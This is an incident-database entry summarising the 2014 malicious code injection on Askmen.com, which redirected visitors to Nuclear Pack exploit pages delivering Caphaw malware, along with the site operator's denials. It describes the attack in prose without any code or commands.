Cyber Incident Victim: AskMen
Date:
Jun 2014
Location:
United States of America
Summary
The men's lifestyle website Askmen.com was reportedly compromised via malicious code injection that redirected visitors to pages hosting exploits targeting vulnerabilities in outdated Java and Adobe Reader software, potentially enabling unauthorized access to user systems. Security researchers identified obfuscated base64-encoded scripts linked to the Nuclear Pack exploit kit, which delivered Caphaw malware capable of data theft and fraudulent activities. While the researchers attributed the attack to actors leveraging automated domain generation, the website operators initially denied any compromise, stating internal investigations found no evidence of malware and emphasizing existing security protocols, though they later acknowledged engaging with external claims of the incident.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
In June 2014, the Askmen.com website—an online men’s publication with over 14 million U.S. readers and international editions—was reported to have been compromised through malicious code injection. Security researchers at Websense identified obfuscated JavaScript code inserted at the bottom of site pages, redirecting visitors to exploit-laden domains. The injected code used base64 encoding to conceal its function, which involved directing users to pages hosting exploits targeting Java (CVE-2013-2465) and Adobe Reader vulnerabilities. The Java vulnerability affected versions 7 update 21 and earlier, enabling attackers to compromise confidentiality, integrity, and availability through unspecified vectors. Websense linked the attack to a domain generation algorithm (DGA) that dynamically created landing pages until June 30, 2014. The exploit page’s obfuscation techniques matched those historically associated with the Nuclear Pack exploit kit, which was known to leverage the same Java flaw. The final payload delivered to victims was identified as Caphaw malware, a threat linked to Russian and Ukrainian actors and capable of click fraud, search hijacking, and information theft.
Askmen.com initially denied awareness of any compromise when contacted by reporters on June 23, with Audience Development Manager Sophie Laplante stating their developers found no malware and that Websense had not alerted them. By June 25, Askmen issued an updated statement confirming a thorough investigation had revealed no evidence of malware but acknowledged engaging with the vendor (Websense) that reported the incident. Websense’s analysis indicated the attack’s infrastructure and methods aligned with Nuclear Pack’s patterns, though Askmen maintained its security measures were robust. The incident highlighted risks to users running outdated Java versions, as the exploit targeted unpatched systems despite Java 7 update 60 being available. No user impact statistics or specific containment actions by Askmen were disclosed beyond their internal review and vendor communication.